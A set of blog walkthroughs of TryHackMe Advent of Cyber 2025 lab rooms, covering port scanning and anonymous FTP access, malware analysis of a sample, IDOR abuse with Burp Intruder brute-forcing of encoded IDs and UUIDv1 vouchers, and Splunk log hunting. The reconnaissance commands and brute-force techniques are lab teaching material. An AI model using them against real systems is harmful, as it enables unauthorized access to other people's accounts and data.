In order to get into a house, we need to know where the door(or window) is. *Nmap lets us discover which ports(windows) are open and closed.
*

If you dont have nmap in your own (debian-based?) machine then sudo apt install nmap

nmap 10.48.157.85 searches most 1000 'popular' ports.

nmap -p- --script=banner 10.49.191.120 scans all 65535 ports possible!
Whats 'banner' here? Its a name of a script (usually Lua langauge). We can 'script scan' the network. Nmap already comes with some scripts such as 'banner' here. You can see the banner script outputs after every open port found:

Now we know that ftp is running in a 'non default' port of 21212

ftp ipadress 21212 then type login username 'anonymous'. This brings us into that machine and a shell. explore the file that contains a tryhackme flag.

Unlike the THM instructions, ls in my case is not running. But it works in THM Attackbox :/

get tbfc_qa_key1 - 'downloads' the file and forwards it to standard output so that we can see the contents in in the terminal.

Copy the key1 fragment, go to browser and type the target machine ip > Click unlock > paste the key1

Get the 2nd key from netcat(nc) command: nc -v ipaddress 25251
The 3rd key requires nmap scanning on the UDP ports, not the default TCP we scanned so far: nmap -sU ipaddress

UDP 53 port, which is a DNS port, is open. Use dig command to perform DNS queries: dig @ipaddress TXT key3.tbfc.local +short

After getting all 3 key fragments(easter_isthe_newxmas), we obtain access to the admin console.

Previously, we scanned for open ports with nmap, now we can just 'ask the os' to list open ports with ss command(socket statistics): ss -tulnp
mysql 3306 port is open. By default localhost access do not require authorization. THM page tells use which database to look for: mysql -D tbfcqa01 -e "select * from flags;"

To answer this question, "What evil message do you see on top of the website?", look at the top of the Target Machine webpage....

Advent of Cyber 2025: Day 6 Writeup - War with Malware | TryHackMe

Mahin Ahmad — Tue, 16 Dec 2025 13:22:29 +0000

Room Link

The room expects us to learn these topics:

The principles of malware analysis
An introduction to sandboxes
Static vs. dynamic analysis
Tools of the trade: PeStudio, ProcMon, Regshot

Today's Target Machine itself is a full VM with GUI. We dont need an Attackbox today.

Dont go around clicking random stuff in the VIM, the first task comes with a warning: "Please note, it is imperative that you do not execute the HopHelper.exe executable yet. The room will instruct you when to do so."

First things first, some jargons:

There are two main branches of malware analysis: static and dynamic. Static analysis focuses on inspecting a file without executing it, whereas dynamic analysis involves execution.
Sandboxes are safe, disposable, isolated environments. For example: each tab in our browsers is (supposed to be) sandboxed! My facebook tab should not be able to access anything in my dev.to tab. Cybersecurity professionals use sandboxes(usually VMs) to run potentially dangerous code. Another real life example would be: If you are a highly targeted or important individual working in a sensitive area, and you get spam emails from attackers a lot, it's a good idea to use your email client in a sandboxed environment! just saying 👀

Information gathered from static analysis

Checksum: A hash (e.g. a93f7e8c4d21b19f2e12f09a5c33e48a) of a file, corresponds exclusively to that file. Suppose someone gives you a file using a third-party medium(a pendrive that changes hands or via a network that is not monitored by bad people!) and texts you in a secure way( or just displays it in his website) the checksum of that un-altered file. You, upon receiving the file, will calculate the checksum and cross-match. Where does checksum fit in our static analysis? You can calculate the checksum and then search for it in a public repository whether our malware/file is already listed as malware by other security researchers.
strings: Could be the linux 'strings' command or any other tool to check for readable text in the file.
imports: What packages does the source code use? IO packages, network modules to connect to its attacker's own server address?
resources: File Icons etc.

In THM Target box VM, start pestudio, open our malware .exe file located in folder: ...Desktop\HopHelper

Question 1, 2: copy the sha256 string visible in pestudio, before you paste it in THM answerbox paste elsewhere to separate properly..

Next tool to know about is regshot, we take a snapshot of the registry, run our malware, take a 2nd snapshot and compare.

THM Question: What registry value has the HopHelper.exe modified for persistence?

Notice there are many results for 'HopHelper'.

Also notice the answer field start with 3 character and a slash. There's your answer 😐. If you are having issues with slash separator like me here, try pasting section by section...

And finally, filtering through processes with Process Monitor which "captures events of various processes on the system". Click the icon named Procmon64 - Shortcut, run the malicious HopHelper.exe under Desktop\HopHelper, wait a minute and then pause capturing in ProcMon.

After applying two filters in ProcMon, if you dont see anything like me then re-read THM instructions. The two fiters are:

Process Name **is **HopHelper.exe
Operation *contains *'TCP'

Question: THM wants know what 'network protocol' is in use. http is the obvious answer...

Bonus question: Can you find the web panel that HopHelper.exe is communicating with?
In above picture we can see connection to a machine named 'breachblocker-sandbox'(aka localhost!) has been established by HopHelper, in port 49982 and 50055.

Does this mean the web panel is breachblocker-sandbox:50055/ or http://breachblocker-sandbox:49882 ? Nope. its at port 80. Open up chrome browser to go to the web panel:

Advent of Cyber 2025: Day 5 IDOR this IDOR that| TryHackMe

Mahin Ahmad — Sat, 13 Dec 2025 18:47:49 +0000

Room Link: THM AoC Day 5

Start both boxes; Or if you have the OpenVPN Connect connected in your machine then start the Target box only and then, in your machine, go to the challenge URL and login info mentioned in Task 2.

IDOR, Insecure Direct Object Reference, is an authorization issue. A system with IDOR vulnerability will give me resources that I'm not supposed to have access to. All I have to do is change the http request parameters. Being able to access other peoples' accounts is called Horizontal privilege escalation and being able to execute operations I am not supposed to, such as running an admin privileged program, is called Vertical privilege escalation; IDOR is a form of horizontal privilege escalation.

Follow all the THM literature to learn about IDOR. Note that at one point, they tell us to "navigate to the Storage tab and expand the Local Storage dropdown". But it's actually here:

Relevant questions:

Exploiting the IDOR found in the view_accounts parameter, what is the user_id of the parent that has 10 children?

=>
Logging in with the default user, we see 5 childs...

We can change user_id parameter, to change into a different user (highlighted yellow above)

Go to Inspect > Storage > Local storage > Expand Dropdown > Click on the address http:/10.48...
The auth_user parameter has a user_id attribute, change its values and test with 11 12 13 14 15 16 🥱 I am not telling you which one it is! Upon changing, hit refresh in the webpage, Notice that a new user profile loads every time with different number of childs...

Remaining two bonus questions, requiring Burp Intruder tool for automation, can be solved with the Attackbox, start that now... (If you dont have any remaining time left, you can still do it in your own machine with mouse-clicks aka ClickOps)
Move the Attackbox to another tab with expand icon(below), Go to Burp Suite and start a new project with the defaults.

From Target tab, click open browser. You may see this error. Settings icon is at top-right.

After clicking 'open browser' again, wait a few seconds to see a Firefox tab. paste the Targetbox URL and Login as usual. You will see that the website keeps 'loading'. Thats because the intercept is on. Go to Proxy tab of Burp Suite and click the colorful "Intercept on". We will turn this on again when we have to modify our request.
Lets catch our breath. This is what it looks like now:

On each interaction, the browser communicates with server using HTTP requests and response, we are going to modify that HTTP request using Burp. First we need to find which request is responsible for what.

After opening Inspect tool in the browser, refresh the webpage.

Revisiting the question: Use either the base64 or md5 child endpoint and try to find the id_number of the child born on 2019-04-17?

In the webpage, click the eye icon on a child card to see the 'ID Number'. But the birth date is not visible. Try the edit icon too.
The plan is to send a formatted request via Burp, change its id hash values and then in the responses find our desired information ie. the birth date.

Lets do it with Burp Suite.

Start from the dashboard webpage.
Go to Burp > Proxy tab > turn on intercept
In the webpage, click on the child edit icon.
You will see that it is not showing. Burp has paused the request response cycle and its waiting for you to manually forward that request.
Using Burp, we can send a formatted request with a different user ID or any other value we want. We can then receive responses for every child and find the birth date part that the question is looking for. My Attackbox just expired, because I took a break :) Now using Burp Community edition in my laptop.

Here I took a detour. the yellow highlighted string is an md5 hash, but of what? You cannot decode a hash, you can encode(hashify) some known string such as child name, child id, birth date etc to check if its a match.
Though we cannot see the birth date in the browser but in the THM task literature, clicking the 'view' button on a child returns the birthdate too. It is found in the response body in browser Inspect tool, not in the webpage. So lesson learned here, our investigation should be focused more on the request response cycle.

Lets follow the Burp Suite Steps again:

Start from the dashboard webpage.
Go to Burp > Proxy tab > turn on intercept
In the webpage, click on the child view icon.
You will see that child item details is not showing. Burp has paused the request.
Highlight just this part, and right click > send to intruder.
Go to 'intruder' tab. First make a list in the notepad and then paste the numbers here from 1 to 20.
In the Payload Processing section, Add a task, select Base64 encoding.
Start attack button, graciously!

I can now use keyboard arrow key to just browse all the result to look for 2019-04-17. Looks like child_id:1x has this birth date :)

Bonus Question 2

"Using the /parents/vouchers/claim endpoint, find the voucher that is valid on 20 November 2025". None of the vouchers had November date. Frankly I had to look another blog for a hint. Lesson learned is look at the Literature again, which topic is not used so far? UUID!

While this look completely random, we can see that the UUID version 1 was used. The issue with UUID 1 is that if we know the exact date when the code was generated, we can recover the UUID. For example, suppose we knew the elves always generated vouchers between 20:00 - 21:00. In that case, we can create UUIDs for that entire time period (3600 UUIDs since we have 60 minutes, and 60 seconds in a minute), which we could use in a brute force attack to aim to recover a valid voucher and get more gifts.

Go to this decoder and paste any of the vouchers you see from the webpage... But we have to generate the UUID with our desired date value. I cannot find an online tool except chatgpt...
So in https://claude.ai/chat, tell it to generate js code to build UUID v1 codes from uuid npm package, for every minute between 20:00 - 24:00 UTC on Nov 20 2025
We will paste all the uuid into Burp a bit later!

In the webpage, when we use the "claim voucher" feature we will see the '/parent/vouchers/claim' endpoint that they are talking about

Turn on Intercept right before clicking the green 'claim voucher'. Type something 'asdf' and enter.
Go to Burp, highlight that 'asdf', right click and send to Intruder tab

Paste all those UUIDs and Start attack...

Watch the magic and filter by 200 status code

Go Touch Grass™® and come back a minute later. You are supposed to find a 200 request that returns a positive response, as opposed to "Voucher not found".

Click the lightbulb icon to get the answer for this special task. If you dont get it right, work backwards. copy the answer and paste into UUID Decoder and see why your list of UUIDs did not work.

Did I get it correct? nope. Both the THM answer (22643e00-c655-11f0-ac99-026ccdf7d769) and my gippity code generated (22643e00-c655-11f0-9acd-a6c6a92e79aa) had the same timestamp in UUID Decoder.
Both start with the same prefixes and give the same time in UUID Decoder. My guess is if we can re-generate the same UUID with the right timestamp, then it's not actually a robust UUID, is it? It definitely depends on other factors, such as MAC address etc. So it has to be from the same computer(the Attackbox?) as well. Feel free to comment and add your observations.

Advent of Cyber 2025: Day 4 Writeup AI-AI-AI | TryHackMe

Mahin Ahmad — Mon, 08 Dec 2025 11:00:03 +0000

Day 4 Challenge Room Page

Look for this summary-picture what to start everyday. You dont need any special tools today, except for python. So if you have OpenVPN setup already then you don't need to start the Attackbox which has a 1 hour limit each day. Just start the Target Machine .

For the next step, open Firefox and follow this quote from the second task:

When you're ready, you can access Van SolveIT at http://10.49.141.x4x. Remember, you will need to do so either from the AttackBox or your own device connected to the VPN.

You have to chat with the AI and finish the stages, to get the first flag. For the first stage, just click "Complete Stage to Continue"

Stage 2: Act as an Attacker i.e. Red Team

From TryHackMe room, copy the Target Machine IP into the code highlighted as MACHINE_IP
Save the file

run it python3 file.py -_-. You will get a response, and flag, put that in TryHackme's second flag's field.
click Complete

Stage 3: Act as defender i.e. Blue Team

The chatbot tells us what to ask:

Let's solve this stage together. You can ask me to analyse an example set of logs for the attack that we just performed!

So ask away, and wait a minute to load
Read the reply, notice that the vulnerable file is called login.php
Click Complete

Stage 4:

Type 'yes' and wait for the reply 🥱
Read and Learn about how to make login.php safe.
Click to Complete Showcase to finish this last stage and get the flag!

The End... In a way, easy rooms are more stressful than harder ones...

Advent of Cyber 2025: Day 3 Writeup Splunk | TryHackMe

Mahin Ahmad — Mon, 08 Dec 2025 10:42:58 +0000

Day 3 Challenge: Splunk Basics - Did you SIEM?

Prelude:
Day 3 starts with an alarm in the SOC dashboard. What is SOC? Think of it as your country's Border Guards! Security Operations Center is a basically a team of cyber security experts who prevent all incoming attacks through monitoring, detection and coordinating responses to attacks. (read more). A sophisticated dashboard and analysis tools(e.g. Splunk here) are the minimum set of tools SOC teams utilize everyday.

In laymen's term, Splunk is a web-styled platform to analyze logs or any kind of machine data. Think journalctl but with more features and more diverse sources of data, in today's case: web traffics.

Jumping to the task, you are probably confused like me that there are no 'Start Attackbox' button and they tell you to click on Splunk! Dont skip reading the introduction task 😐. There is a web-link there. You dont need an Attackbox today.

Now, read and follow all the instructions in the second task. If you cannot get to step 6 below, then notice the arrow icon > adjacent to the Time column.

When was the peak traffic in the logs? You can hover over the histogram to see the date.
What is the count of Havij user_agent events? Run this query: index=main sourcetype=web_traffic user_agent=*Havij*

How many path traversal attempts to access sensitive files on the server were observed?

Approach:
I thought this query index=main sourcetype=web_traffic path="*..*" OR path="*redirect*" would do but when The answer 1291 is too big for the Answer field:

Focus on the "sensitive files" part and check the corresponding command they showed to us:

Running the query in the picture returns 347 results, not the correct answer either. Ask yourself if backups and logs are sensitive, yes, but from the lessons we know another sensitive file bunnylock.bin. So I tried index=main sourcetype=web_traffic path=*bunnylock.bin* and its showed 833 results, still incorrect.

Our only clues are 'path traversal' and 'sensitive files'. Lets refocus on 'path traversal' here. But we already tried the query they taught us:
sourcetype=web_traffic client_ip="<REDACTED>" AND path="*..*" OR path="*redirect*"
... So lets try without the redirects? Result count is now 658✅. 'Dont beat around the bush' they say, so we beat around the correct bush!

Next question : How many bytes were transferred to the C2 server IP from the compromised web server?

Leverage the autocomplete, no need cram every column:

Done!
These kinds of rooms are called walkthrough rooms.